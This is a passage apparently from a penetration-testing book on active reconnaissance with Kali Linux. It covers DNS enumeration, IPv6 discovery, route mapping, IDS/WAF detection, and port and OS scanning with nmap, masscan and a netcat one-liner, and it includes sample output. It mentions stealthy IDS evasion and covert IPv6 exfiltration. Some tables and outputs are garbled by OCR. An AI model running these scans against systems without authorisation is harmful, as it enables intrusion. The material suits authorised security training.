Comprehensive tools focused on reconnaissance were originally command-line tools with a defined set of functions; one of the most commonly used was **Deep Magic Information Gathering Tool (DMitry)**. DMitry could perform whois lookups, retrieve netcraft.com information, search for sub-domains and email addresses, and perform TCP scans. Unfortunately, it wasn't extensible beyond these functions.

The following screenshot provides details on running DMitry on www.cyberhia.com:

dmitry -winsepo out.txt www.cyberhia.com

root@kali:~# dmitry -winsepo out.txt www.cyberhia.com Deepmagic Information Gathering Tool "There be some deep magic going on" Writing output to 'out.txt' HostIP:166.62.126.169 HostName:www.cyberhia.com Gathered Inet-whois information for 166.62.126.169 166.50.0.0 - 166.86.255.255 inetnum: netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK IPv4 address block not managed by the RIPE NCC descr: remarks: remarks: You can find the whois server to query, or the remarks: IANA registry to query on this web page: remarks: http://www.iana.org/assignments/ipv4-address-space remarks: remarks: You can access databases of other RIRs at: remarks: remarks: remarks: AFRINIC (Africa) http://www.afrinic.net/ whois.afrinic.net remarks: remarks: remarks: APNIC (Asia Pacific) http://www.apnic.net/ whois.apnic.net remarks: remarks: remarks: ARIN (Northern America) http://www.arin.net/ whois.arin.net remarks:

Recent advances have created comprehensive framework applications that combine passive and active reconnaissance; in the following section, we will be looking more at recon-ng.

The recon-ng framework

The recon-ng framework is an open source framework for conducting reconnaissance (passive and active). The framework is similar to Metasploit and **Social Engineer Toolkit (SET)**; recon-ng uses a very modular framework. Each module is a customized command interpreter, preconfigured to perform a specific task.

The recon-ng framework and its modules are written in Python, allowing penetration testers to easily build or alter modules to facilitate testing.

The recon-ng tool also leverages third-party APIs to conduct some assessments; this additional flexibility means that some activities undertaken by recon-ng may be tracked by those parties. Users can specify a custom useragent string or proxy requests to minimize alerting the target network.

recon-ng is installed by default in the newer versions of Kali. All data collected by recon-ng is placed in a database, allowing you to create various reports against the stored data. The user can select one of the report modules to automatically create either a CVS report or an HTML report.

To start the application, enter recon-ng at the prompt, as shown in the following screenshot. The start screen will indicate the number of modules present, and the help command will show the commands available for navigation, as shown in the following screenshot:



To show the available modules, type show at the recon-ng> prompt. To load a specific module, type load followed by the name of the module. Hitting the *Tab* key while typing will autocomplete the command. If the module has a unique name, you can type in the unique part of the name, and the module will be loaded without entering the full path.

Entering info, as shown in the screenshot that follows, will provide you with information on how the module works and where to obtain API keys if required.

Once the module is loaded, use the set command to set the options, and then enter run to execute, as shown in the following screenshot:



In general, testers rely on recon-ng to do the following:

- Harvest contacts using whois, Jigsaw, LinkedIn, and Twitter (use the mangle module to extract and present email data)
- Identify hosts
- Identify geographical locations of hosts and individuals using hostop, ipinfodb, maxmind, uniapple, and wigle
- Identify host information using netcraft and related modules
- Identify account and password information that has previously been compromised and leaked onto the internet (the pwnedlist modules, wascompanyhacked, xssed, and punkspider)

IPv4

The **Internet Protocol** (**IP**) address, is a unique number used to identify devices that are connected to a private network or the public internet. Today, the internet is largely based on version 4, IPv4. Kali includes several tools to facilitate DNS reconnaissance, as given in the following table:

| Application | Description |
|----------------------------------|--|
| dnsenum, dnsmap, and dnsrecon | These are comprehensive DNS scanners—DNS record enumeration (A, MX, TXT, SOA, wildcard, and so on), subdomain brute-force attacks, Google lookup, reverse lookup, zone transfer, and zone walking. dsnrecon is usually the first choice—it is highly reliable, results are well parsed, and data can be directly imported into the Metasploit framework. |
| dnstracer | This determines where a given DNS gets its information from, and follows the chain of DNS servers back to the servers that know the data. |
| dnswalk | This DNS debugger checks specified domains for internal consistency and accuracy. |
| fierce | This locates non-contiguous IP space and hostnames against specified domains by attempting zone transfers and then attempting brute-force attacks to gain DNS information. |

During testing, most investigators run fierce to confirm that all possible targets have been identified, and then run at least two comprehensive tools (for example, dnsenum and dnsrecon) to generate the maximum amount of data and provide a degree of cross-validation.

In the following screenshot, dnsrecon is used to generate a standard DNS record search and a search that is specific for SRV records. An excerpt of the results is shown for each case:

| root | t@kali:~# dnsrecon -t std -d cyberhia.com |
|------|--|
| [*] | Performing General Enumeration of Domain:cyberhia.com |
| [!] | Wildcard resolution is enabled on this domain |
| [!] | It is resolving to 92.242.132.24 |
| [!] | All queries will resolve to this address!! |
| [-] | DNSSEC is not configured for cyberhia.com |
| [*] | SOA ns17.domaincontrol.com 216.69.185.9 |
| [*] | NS ns17.domaincontrol.com 216.69.185.9 |
| [*] | NS ns17.domaincontrol.com 2607:f208:206::9 |
| [*] | NS ns18.domaincontrol.com 173.201.76.9 |
| [*] | NS ns18.domaincontrol.com 2603:5:22c0::9 |
| [*] | MX aspmx3.googlemail.com 74.125.130.27 |
| [*] | MX alt1.aspmx.l.google.com 64.233.163.27 |
| [*] | MX alt2.aspmx.l.google.com 74.125.130.27 |
| [*] | MX aspmx.1.google.com 74.125.133.27 |
| [*] | MX aspmx2.googlemail.com 64.233.163.27 |
| [*] | MX aspmx3.googlemail.com 2404:6800:4003:c01::1a |
| [*] | MX alt1.aspmx.l.google.com 2a00:1450:4010:c06::1a |
| [*] | MX alt2.aspmx.l.google.com 2404:6800:4003:c01::1a |
| [*] | MX aspmx.l.google.com 2a00:1450:400c:c06::1b |
| [*] | MX aspmx2.googlemail.com 2a00:1450:4010:c06::1b |
| [*] | A cyberhia.com 166.62.126.169 |
| [*] | TXT cyberhia.com google-site-verification=qJu2HdlrKYbaEEx8 |
| [*] | TXT cyberhia.com v=spfl include: spf.google.com ~all |

dnsrecon allows the penetration tester to obtain the SOA record, **Name Servers** (**NS**), **mail exchanger** (**MX**) hosts, servers sending emails using **Sender Policy**

Framework (SPF), and the IP address ranges in use.

IPv6

Although IPv4 seems to permit a large address space, freely available IP addresses were exhausted several years ago, forcing the employment of NAT to increase the number of available addresses. A more permanent solution has been found in the adoption of an improved IP addressing scheme, IPv6. Although it constitutes less than five percent of internet addresses, its usage is increasing, and penetration testers must be prepared to address the differences between IPv4 and IPv6.

In IPv6, the source and destination addresses are 128-bits in length, yielding 2¹²⁸ possible addresses, that is, 340 undecillion addresses!

The increased size of the addressable address space presents some problems to penetration testers, particularly when using scanners that step through the available address space looking for live servers. However, some features of the IPv6 protocol have simplified discovery, especially the use of ICMPv6 to identify active link-local addresses.

It is important to consider IPv6 when conducting initial scans for the following reasons:

- There's uneven support for IPv6 functionality in testing tools, so the tester must ensure that each tool is validated to determine its performance and accuracy in IPv4, IPv6, and mixed networks.
- Because IPv6 is a relatively new protocol, the target network may contain misconfigurations that leak important data; the tester must be prepared to recognize and use this information.
- Older network controls (firewalls, IDS, and IPS) may not detect IPv6. In such cases, penetration testers can use IPv6 tunnels to maintain covert communications with the network and exfiltrate the data undetected.

Using IPv6-specific tools

Kali includes several tools developed to take advantage of IPv6 (most comprehensive scanners, such as nmap, now support IPv6), some of which are as follows; tools that are particular to IPv6 were largely derived from the **THC-IPv6 Attack Toolkit**.

The following table provides the list of tools that are utilized for reconnaissance of IPv6:

| Application | Description |
|-----------------|---|
| dnsdict6 | Enumerates sub-domains to obtain IPv4 and IPv6 addresses (if present) using a brute force search based on a supplied dictionary file or its own internal list |
| dnsrevenum6 | Performs reverse DNS enumeration given an IPv6 address |
| covert_send6 | Sends the content of a file covertly to the target |
| covert_send6d | Writes covertly received content to file |
| denial6 | Performs various denial of service attacks on a target |
| detect-new-ip6 | Detects new IPv6 addresses joining the local network |
| detect_sniffer6 | Tests whether systems on the local LAN are sniffing |

| exploit6 | Performs exploits of various CVE-known IPv6 vulnerabilities on the destination |
|-------------|--|
| fake_dhcps6 | Fake DHCPv6 server |

Metasploit can also be utilized for IPv6 host discovery.

The auxiliary/scanner/discovery/ipv6_multicast_ping module will discover all of the IPv6-enabled machines with the physical (MAC) address, as shown in the following screenshot:



THC IPv6 suite atk6-alive6 will discover alive addresses in the same segment, as shown in the following screenshot:

root@kali:~# atk6-alive6 eth0

Alive: fe80::1891:4140:f857:fdd0 [ICMP echo-reply]
Alive: fe80::40ab:8801:a334:774d [ICMP parameter problem]
Alive: fe80::a00:27ff:fe0a:b478 [ICMP echo-reply]
Alive: fe80::b6ef:faff:fe94:21c5 [ICMP echo-reply]

Scanned 1 address and found 4 systems alive

Mapping the route to the target

Route mapping was originally used as a diagnostic tool that allows you to view the route that an IP packet follows from one host to the next. Using the **Time To Live (TTL)** field in an IP packet, each hop from one point to the next elicits an ICMPTIME_EXCEEDED message from the receiving router, decrementing the value in the TTL field by 1. The packets count the number of hops and the route taken.

From an attacker's or penetration tester's perspective, the traceroute data yields the following important data:

- The exact path between the attacker and the target
- Hints pertaining to the network's external topology
- Identification of accessing control devices (firewalls and packet-filtering routers) that may be filtering attack traffic
- If the network is misconfigured, it may be possible to identify internal addressing

Using a web-based traceroute (www.traceroute.org), it is possible to trace various geographic origin sites to the target network. These types of scans will frequently identify more than one different network connecting to the target, which is information that could be missed by conducting only a single traceroute command from a location close to the target. Web-based traceroute may also identify multi-homed hosts that connect two or more networks together. These hosts are an important target for attackers, because they drastically increase the attack surface leading to the target.

In Kali, traceroute is a command-line program that uses ICMP packets to map the route; in Windows, the program is tracert.

If you launch traceroute from Kali, it is likely that you will see most hops filtered (data is shown as * * *). For example, traceroute from the author's present location to demo.cyberhia.com would yield the following:

```
traceroute to demo.cyberhia.com (166.62.126.169), 30 hops max, 60 byte packets
   gateway (192.168.0.1) 6.137 ms 6.852 ms 6.894 ms
 1
      * *
   brnt-core-2b-xe-801-0.network.virginmedia.net (62,252,212,53) 25,536 ms 25,607 ms 25,592 ms
    . . .
 4
   * * *
   m686-mp2.cvx1-b.lis.diel.ntli.net (62.254.42.174) 34.297 ms 21.736 ms 20.403 ms
 6
    . . .
   us-nyc0lb-rd2-ae9-0.aorta.net (84.116.140.170) 101.786 ms 101.728 ms 93.185 ms
8
   us-nyc01b-ri2-ae3-0.aorta.net (84.116.137.194) 92.565 ms 96.770 ms 96.483 ms
   lag-5.ear3.NewYork1.Level3.net (4.68.72.9) 97.545 ms 97.181 ms 86.056 ms
10
11
    . .
12
   4.28.83.74 (4.28.83.74) 162.499 ms 162.578 ms 174.274 ms
13
  be38.trmc0215-01.ars.mgmt.phx3.qdg (184.168.0.69) 157.976 ms be39.trmc0215-01.ars.mgmt.phx3.qdg
77 ms be38.trmc0215-01.ars.mgmt.phx3.gdg (184.168.0.69) 160.129 ms
14
   be39.trmc0215-01.ars.mgmt.phx3.gdg (184.168.0.73) 159.118 ms 159.086 ms 158.535 ms
   * * *
15
16
   . . .
   * *
       .
18
      ٠
19
    ip-166-62-126-169.ip.secureserver.net (166.62.126.169) 194.981 ms 192.534 ms 190.290 ms
```

However, if the same request was run using tracert from the Windows command line, we would see the following:

C:\WINDOWS\system32\cmd.exe - 6 X C:\Users\veluv>tracert demo.cyberhia.com Tracing route to demo.cyberhia.com [166.62.126.169] over a maximum of 30 hops: 5 3 ms 192.168.0.1 3 ms ms ^C 2 × C:\Users\veluv>tracert www.google.com Tracing route to www.google.com [216.58.198.228] over a maximum of 30 hops: 192.168.0.1 7 ms 3 ms 2 ms 2 * 3 16 ms .252.212.53] Request timed out. brnt-core-2b-xe-801-0.network.virginmedia.net [6 × × 15 15 ms ms Request timed out. Request timed out. eislou2-ic-1-ae3-0.network.virginmedia.net [62.2 4 × × 56 × × 26 ms 28 ms 22 ms 6 26 r 54.85.145] 7 30 r 8 * 9 28 r 10 32 r 11 39 r 12 37 r 13 33 r 14 32 r 15 47 r 6-14-250-212.static.virginm.net [212.250.14.6] Request timed out. 108.170.232.104 108.170.246.176 216.239.58.129 216.239.59.4 74.125.242.65 74.125.242.65 27 ms * 30 ms 31 ms * 24 ms 60 ms 26 ms 49 ms 29 ms 27 ms 56 ms 28 ms 32 ms 39 ms 29 23 30 25 24 32 ms ms MS ms ms ms ms 74.125.252.129 ms ms 1hr26s04-in-f228.1e100.net [216.58.198.228] ms ms Trace complete.

Not only do we get the complete path, but we can also see that www.google.com is resolving to a slightly different IP address, indicating that load balancers are in effect (you can confirm this using Kali's 1bd script; however, this activity may be logged by the target site).

The reason for the different path data is that, by default, traceroute uses UDP datagrams while Windows tracert uses ICMP echo request (ICMP type 8). Therefore, when completing traceroute using Kali tools, it is important to use multiple protocols in order to obtain the most complete path and to bypass packet-filtering devices.

Kali provides the following tools for completing route traces:

| Application | Description |
|-------------|--|
| hping3 | This is a TCP/IP packet assembler and analyzer. This supports TCP, UDP, ICMP, and raw-IP and uses a ping-like interface. |
| intrace | This enables users to enumerate IP hops by exploiting existing TCP connections, both initiated from the local system or network or from local hosts. This makes it very useful for bypassing external filters such as firewalls. intrace is a replacement for the less reliable <code>@trace</code> program. |
| trace6 | This is a traceroute program that uses ICMP6. |

hping3 is one of the most useful tools due to the control it gives over packet type, source packet, and destination packet. For example, Google does not allow ping requests. However, it is possible to ping the server if you send the packet as a TCP SYN request.

In the following example, the tester attempts to ping Google from the command line. The returned data identifies that demo.cyberhia.com is an unknown host; Google is clearly blocking ICMP-based ping commands. However, the next command invokes hping3, instructing it to do the following:

• Send a ping-like command to Google using TCP with the syn flag set (-s)

- Direct the packet to port 80; legitimate requests of this type are rarely blocked (- p 80)
- Set a count of sending three packets to the target (-c 3)

To execute the previous steps, use the commands shown in the following screenshot:

| HPING (| demo.cyberhia.com | eth0 166.6 | a.com -p 80 - 2.126.169); s | 5 3 set, 40 h | eaders | + 0 data | bytes | |
|----------------|---|---------------------------|--------------------------------|------------------|--------|-----------|----------|------|
| len=46 | ip-166.62.126.169 | tt1-44 DF | id=0 sport=80 | Flags-SA | seq=0 | win-14600 | rtt=349. | 9 ms |
| 1en=46 | ip-166.62.126.169 | tt1-45 DF | 1d=0 sport=80 | flags-SA | seq=1 | win-14600 | rtt=223. | 1 ms |
| 1en-46 | 1p-166.62.126.169 | tt1-44 DF | id-0 sport-80 | flags-SA | seq=2 | win-14600 | rtt-300. | 8 ms |
| des 3 packs | no.cyberhia.com hp. ets transmitted, 3 | ing statist packets re | ic ceived, 0% par | cket loss | | | | |

The hping3 command successfully identifies that the target is online and provides some basic routing information.

Identifying the external network infrastructure

Once the tester's identity is protected, identifying the devices on the internetaccessible portion of the network is the next critical first step in scanning a network.

Attackers and penetration testers use this information to do the following:

- Identify devices that may confuse (load balancers) or eliminate (firewalls and packet inspection devices) test results
- Identify devices with known vulnerabilities
- Identify the requirement for continuing to implement stealthy scans
- Gain an understanding of the target's focus on secure architecture and on security in general

traceroute provides basic information on packet filtering abilities; some other applications on Kali include the following:

| Application | Description | |
|-------------|---|--|
| lbd | Uses two DNS and HTTP-based techniques to detect load balancers (shown in the following screenshot) | |
| miranda.py | Identifies universal plug-and-play and UPNP devices | |
| nmap | Detects devices and determines the operating systems and their version | |
| | Web-based search engine that identifies devices connected to | |

| Shodan | the internet, including those with default passwords, known misconfigurations, and vulnerabilities |
|-----------|--|
| censys.io | Similar to the Shodan search that has already scanned the entire internet, with certificate details, technology information, misconfiguration, and known vulnerabilities |

The following screenshot shows the results obtained on running the 1bd script against Facebook; as you can see, Google uses both DNS-Loadbalancing as well as HTTP-Loadbalancing on its site. From a penetration tester's perspective, this information could be used to explain why spurious results are obtained, as the load balancer shifts a particular tool's activity from one server to another. The following screenshot displays the HTTP-load balancing:

| coot@kali: + 1bd www |
|--|
| <pre>lbd - load balancing detector 0.4 - Checks if a given domain uses load-balancing.</pre> |
| Checking for BMS-Loadbalancing: NOT FOUND Checking for HTTP-Loadbalancing [Server]: |
| NOT FOUND |
| <pre>Chocking for HTTF-Loadbalancing [Date]: 16:33:49, 16:33:49, 16:33:49, 16:33:49, 16:33:49, 16:33:50, 16:33:50, 16:33:50, 16:33:50, 16:33:51, 16: 3:51, 16:33:51, 16:33:51, 16:33:51, 16:33:51, 16:33:52, 16:33:52, 16:33:52, 16:33:52, 16:33:52, 16:33:52, 16:33:52, 16:33:52, 16:33:52, 16:33:53, 16:33:53, 16:33:53, 16:33:53, 16:33:53, 16:33:54, 10:33:54, 10:30:54, 10:30:54, 1</pre> |
| Checking for HTTP-Loadbalancing [Diff]: FOUND < X-FB-Debug: 7QIJSA6gveuWk7MayNx68HnFO3VstBsjST/xf23C3bg7uxUDmCDhhu399VjLBn3FaP+uPMq02TBHC > X-FB-Debug: E2tJ1H38PTVAcL&mE7qJIjcb9tm0BXJgyRB01jgKdHkBiBAj21bMDG4lVTHBkUM4BlEuoA8LmJ49k |
| www |

Mapping beyond the firewall

Attackers normally start the network debugging using traceroute utility, which attempts to map all of the hosts on a route to a specific destination host or system. Once the target is reached, as the TTL (Time to Live) field will be 0, the target will discard the datagram and generate an ICMP time exceeded packet back to its originator. A regular traceroute will be as follows:



As you see from the preceding example, we cannot go beyond a particular IP, which most probably means that there is a packet filtering device at hop 3. Attackers would dig a little bit deeper to understand what is deployed on that IP.

Deploying the default UDP datagram option, it will increase the port number at every time it sends an UDP datagram. Hence, attackers will start pointing a port number to reach the final target destination.

IDS/IPS identification

Penetration testers can utilize fragroute and wafwoof to identify whether there are any detection or prevention mechanisms put in place such as **Intrusion Detection System (IDS)** or an **Intrusion Prevention system (IPS)** or a **Web application Firewall (WAF)**.

fragroute is a default tool in Kali Linux that can perform fragmentation of packets. The network packets will allow attackers to intercept, modify, and rewrite the egress traffic for a specific target. This tool comes in very handy on a highly secured remote environment.

The following screenshot provides the list of options that are available in fragroute to determine any network IDs in place:

```
root@kali:~# fragroute
Usage: fragroute [-f file] dst
Rules:
       delay first|last|random <ms>
       drop first|last|random <prob-%>
       dup first|last|random <prob-%>
       echo <string> ...
       ip chaff dup|opt|<ttl>
       ip frag <size> [old|new]
       ip opt lsrr|ssrr <ptr> <ip-addr> ...
       ip_ttl <ttl>
       ip_tos <tos>
       order random | reverse
       print
       tcp chaff cksum|null|paws|rexmit|seq|syn|<ttl>
       tcp opt mss|wscale <size>
       tcp seg <size> [old|new]
```

Attackers can also write their own custom configuration to perform fragmentation attacks to delay, duplicate, drop, fragment, overlap, reorder, source-route, and segment. A sample custom configuration would look like the following screenshot:



fragroute on target is as simple as running fragroute target.com and if there are any connections happening to the target.com address, then the attackers will be able to see the traffic that is being sent to the target.com. Note that only when you have a route to the target will you be able to fragment the route. The following screenshot shows that the IP segments are fragmented as per the custom configuration file:

```
root0ka]:-# fragroute 192.168.0.143
fragroute: tcp_seg -> ip_frag -> ip_chaff -> ip_ttl -> order -> print
192.168.0.124.30003 > 192.168.0.143.30551: SP 1783462266:1783462294(28) win 30324 [tos 0x10] [delay
0.001 ms]
192.168.0.124.47976 > 192.168.0.143.2222: S 204684773:204684773(0) win 29200 dmss 1460,sack0K,timest
amp 147562966 0,nop,wscale 7> [tos 0x10]
192.168.0.124.22882 > 192.168.0.143.14418; SF 1145845612:1145845620(8) ack 1718833993 win 17528 urg
18809 <[bad opt]> [tos 0x10] [delay 0.001 ms]
192.168.0.124.47976 > 192.168.0.143.2222: ack 1250190100 win 229 <nop,nop,timestamp 147562970 4294
942010> [tos 0x10]
192.168.0.124.47976 > 192.168.0.143.2222: ack 1250190100 win 229 <nop,nop,timestamp 147562970 4294
942010> [tos 0x10]
192.168.0.124.18540 > 192.168.0.143.22749: P 1882277722:1882277734(12) ack 796406353 win 16980 urg 2
6439 (frag 55940:3200+) [tos 0x10] [delay 0.001 ms]
192.168.0.124.47976 > 192.168.0.143.2222: P ack 1250190100 win 229 <nop,nop,timestamp 147565057 4294
942010> (frag 61342:3200+) [tos 0x10]
192.168.0.124 > 192.168.0.143: (frag 61342:2032) [tos 0x10]
192.168.0.124 > 192.168.0.143: (frag 413545:1832) [tos 0x10]
192.168.0.124 > 192.168.0.143: (frag 413545:1832) [tos 0x10]
192.168.0.124 > 192.168.0.143: (frag 413545:1832) [tos 0x10]
192.168.0.124 > 192.168.0.143: (frag 413545:18
```

Another tool that attackers utilize during the active reconnaissance is wafw00f; this tool is preinstalled in the latest version of Kali Linux. It is used to identify and fingerprint the **Web Application Firewall (WAF**) products. It also provides a list of well-known WAFs. It can be listed down by adding the -1 switch to the command (for example, wafw00f -1)

The following screenshot provides the exact WAF running behind a web application:

| root@kali:~# wafw00f www. | k.com |
|---|---|
| | ~ ~ |
| ///7//.'/////////////////////////////// | //7///,'_'_\/_/ / V // 0 // 0 // _/ 1_,' _,' _,'/_/ < ' |
| WAFW00F - Web Applicat | tion Firewall Detection Tool |
| By Sandro Gauci && Wer | ndel G. Henrique |
| Checking http://www. The site http://www. Number of requests: 1 | k.com k.com is behind a CloudFlare |

Enumerating hosts

Host enumeration is the process of gaining specific particulars regarding a defined host. It is not enough to know that a server or wireless access point is present; instead, we need to expand the attack surface by identifying open ports, the base operating system, services that are running, and supporting applications.

This is highly intrusive and, unless care is taken, the active reconnaissance will be detected and logged by the target organization.

Live host discovery

The first step is to run network ping sweeps against a target address space and look for responses that indicate that a particular target is live and capable of responding. Historically, pinging is referred to as the use of ICMP; however, TCP, UDP, ICMP, and ARP traffic can also be used to identify live hosts.

Various scanners can be run from remote locations across the internet to identify live hosts. Although the primary scanner is nmap, Kali provides several other applications that are also useful, as shown in the following table:

| Application | Description |
|--|--|
| alive6 and detect-new- ip6 | This is for IPv6 host detection. detect-new-ip6 runs on a scripted basis and identifies new IPv6 devices when added. |
| Dnmap and nmap | nmap is the standard network enumeration tool. dnmap is a distributed client-server implementation of the nmap scanner. PBNJ stores nmap results in a database, and then conducts historical analyses to identify new hosts. |
| fping, hping2, hping3, and nping | These are packet crafters that respond to targets in various ways to identify live hosts. |

To the penetration tester or attacker, the data returned from live host discovery will identify the targets for attack.

Run multiple host discovery scans while conducting a penetration test. Certain devices may be time dependent. During one penetration test, it was discovered that the system administrator set up a game server after regular business hours. Because it was not an approved business





system, the administrator didn't follow the normal process for securing the server; multiple vulnerable services were present, and it hadn't received necessary security patches. Testers were able to compromise the game server and gain access to the underlying corporate network using vulnerabilities in the administrator's game server.

Port, operating system, and service discovery

Kali provides several different tools useful for identifying open ports, operating systems, and installed services on remote hosts. The majority of these functions can be completed using nmap. Although we will focus on examples using nmap, the underlying principles apply to the other tools as well.

Port scanning

Port scanning is the process of connecting to TCP and UDP ports to determine what services and applications are running on the target device. There are 65,535 ports each for both TCP and UDP on each system. Some ports are known to be associated with particular services (for instance, TCP 20 and 21 are the usual ports for the **File Transfer Protocol** (**FTP**) service). The first 1,024 are the well-known ports, and most defined services run over ports in this range; accepted services and ports are maintained by IANA (http://www.iana.org/assignments/service-

names-port-numbers/service-names-port-numbers.xhtml).



Although there are accepted ports for particular services, such as port 80 for web-based traffic, services can be directed to use any port. This option is frequently used to hide particular services, particularly if the service is known to be vulnerable to attack. However, if attackers complete a port scan and do not find an expected service or find it using an unusual port, they will be prompted to investigate further.

The universal port mapping tool, <code>nmap</code>, relies on active stack fingerprinting. Specially crafted packets are sent to the target system, and the response of the OS to those packets allows <code>nmap</code> to identify the OS. In order for <code>nmap</code> to work, at least one listening port must be open, and the operating system must be known and fingerprinted, with a copy of that fingerprint in the local database.

Using nmap for port discovery is very noisy—it will be detected and logged by network security devices. Some points to remember are as follows:

- Attackers and penetration testers focused on stealth will test only the ports that impact the kill chain they are following to their specific target. If they are launching an attack that exploits vulnerabilities in a web server, they will search for targets with port 80 or port 8080 accessible.
- Most port scanners have default lists of ports that are scanned—ensure that you know what is on that list and what has been omitted. Consider both TCP and UDP ports.
- Successful scanning requires a deep knowledge of TCP/IP and related protocols, networking, and how particular tools work. For example, SCTP is an increasingly common protocol on networks, but it is rarely tested on corporate networks.

- Port scanning, even when done slowly, can impact a network. Some older network equipment and equipment from specific vendors will lock when receiving or transmitting a port scan, hence turning a scan into a denial of service attack.
- Tools used to scan a port, particularly nmap, are being extended with regards to functionalities. They can also be used to detect vulnerabilities and exploit simple security holes.

Writing your own port scanner using netcat

While attackers utilize the proxying application and Tor network, it is also possible to write their own custom network port scanner. The following one-line command can be utilized during penetration testing to identify the list of open ports just by using netcat as shown in the following screenshot:

| while read r; do nc -v -z \$r 1-65535; done < iplist |
|---|
| <pre>root@kali:~# while read r; do nc -v -z \$r 1-65535; done < iplist</pre> |
| dlinkrouter [192.168.0.1] 56209 (?) open |
| dlinkrouter [192.168.0.1] 49152 (?) open |
| dlinkrouter [192.168.0.1] 45555 (?) open |
| dlinkrouter [192.168.0.1] 8183 (?) open |
| dlinkrouter [192.168.0.1] 8182 (?) open |
| dlinkrouter [192.168.0.1] 8181 (?) open |
| dlinkrouter [192.168.0.1] 7777 (?) open |
| dlinkrouter [192.168.0.1] 4433 (?) open |
| dlinkrouter [192.168.0.1] 443 (https) open |
| dlinkrouter [192.168.0.1] 80 (http) open |
| dlinkrouter [192.168.0.1] 53 (domain) open |
| DNS fwd/rev mismatch: kali != kali.secure |
| kali [192.168.0.124] 55982 (?) open |
| kali [192.168.0.124] 33658 (?) open |
| kali [192.168.0.124] 8000 (?) open |
| kali [192.168.0.124] 22 (ssh) open |

The same script can be modified for more targeted attacks on a single IP, as follows:

```
while read r; do nc -v -z target $r; done < ports
```

The chances of getting alerted in any intrusion detection system using custom
port scanners is high.

Fingerprinting the operating system

Determining the operating system of a remote system is conducted using two types of scans:

- Active fingerprinting: The attacker sends normal and malformed packets to the target and records its response pattern, referred to as the fingerprint. By comparing the fingerprint to a local database, the operating system can be determined.
- **Passive fingerprinting**: The attacker sniffs, or records and analyzes the packet stream to determine the characteristics of the packets.

Active fingerprinting is faster and more accurate than passive fingerprinting. In Kali, the two primary active tools are nmap and xprobe2.

The nmap tool injects packets into the target network and analyzes the response that it receives. In the following screenshot, the -o flag commands nmap to determine the operating system:

nmap -sS -O target.com

A related program, xprobe2, uses different TCP, UDP, and ICMP packets to bypass firewalls and avoid detection by IDS/IPS systems. xprobe2 also uses fuzzy pattern matching—the operating system is not identified as definitely being one type; instead, it is assigned the probability of being one of several possible variants:

xprobe2 www.target.com

Note that it is simple for the target system to hide the true operating system. Since fingerprinting software relies on packet setting, such as time-to-live or the initial windows size, changes to these values or other user-configurable settings can change the tool results. Some organizations actively change these values to make the final stages of reconnaissance more difficult.

Determining active services

The final goal of the enumeration portion of reconnaissance is to identify the services and applications that are operational on the target system. If possible, the attacker would want to know the service type, vendor, and version to facilitate the identification of any vulnerability.

The following are some of the several techniques used to determine active services:

- **Identify default ports and services**: If the remote system is identified as having a Microsoft operating system with port 80 open (the WWW service), an attacker may assume that a default installation of Microsoft IIS is installed. Additional testing will be used to verify this assumption (nmap).
- **Banner grabbing**: This is done using tools such as amap, netcat, nmap, and Telnet.
- **Review default web pages**: Some applications install with default administration, error, or other pages. If attackers access these, they will provide guidance on installed applications that may be vulnerable to attack. In the following screenshot, the attacker can easily identify the version of Apache Tomcat that has been installed on the target system.
- **Review source code**: Poorly configured web-based applications may respond to certain HTTP requests such as HEAD OT OPTIONS with a response that includes the web server software version, and, possibly, the base operating system or the scripting environment in use. In the following screenshot, netcat is launched from the command line and is used to send raw HEAD packets to a particular website. This request generates an error message (404 not found); however, it also identifies that the server is running Apache 2.4.37 with application server PHP 5.6.39:

root@kali:~# nc -vv 192.168.0.101 80
192.168.0.101: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.101] 80 (http) open
HEAD / HTTP/1.0
HTTP/1.1 400 Bad Request
Date: Sat, 19 Jan 2019 22:02:28 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.39
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Expires: Sat, 19 Jan 2019 22:02:28 GMT

Large-scale scanning

In case of testing bigger organizations with multiple class B/C IP ranges, largescale scanning is engaged. For example, with a global company, often a number of IP blocks exist as part of external internet facing. As mentioned earlier in chapt er 2, *Open Source Intelligence and Passive Reconnaissance*, attackers do not have time limitations to scan, but penetration testers do. Pentesters can engage multiple tools to perform the activity; Masscan is one of the tools that would be engaged to scan large-scale IP blocks to quickly analyze the live hosts in the target network. Masscan is installed in Kali by default. The biggest advantage of Masscan is randomization of hosts, ports, speed, flexibility, and compatibility. The following screenshot provides a Class C scanning network within a few seconds to complete and identify the available HTTP service on port 80 and services running on the target hosts:

root@kali:-# masscan 192.168.0.0/24 -p80 -sS -Pn -n --randomize-hosts
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-01-20 16:48:54 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts (1 port/host)
Discovered open port 80/tcp on 192.168.0.16
Discovered open port 80/tcp on 192.168.0.1

DHCP information

The **Dynamic Host Configuration Protocol** (**DHCP**) is a service that dynamically assigns an IP address to the hosts on the network. This protocol operates at the MAC sub layer of the Data-Link layer of the TCP/IP protocol stack. Upon selection of auto-configuration, a broadcast query will be sent to the DHCP servers and when a response is received from the DHCP server, a broadcast query is sent by the client to the DHCP server requesting required information. The server will now assign an IP address to the system and other configuration parameters such as the subnet mask, DNS, and the default gateway.

Sniffing is a great way of collecting passive information once connected to a network. Attackers will be able to see a lot of broadcast traffic, as shown in the following screenshot:

| 1 | oply a display filter <co< th=""><th>1-79</th><th></th><th></th><th>🛄 + Expression +</th></co<> | 1-79 | | | 🛄 + Expression + |
|-----|---|---|--|---|---|
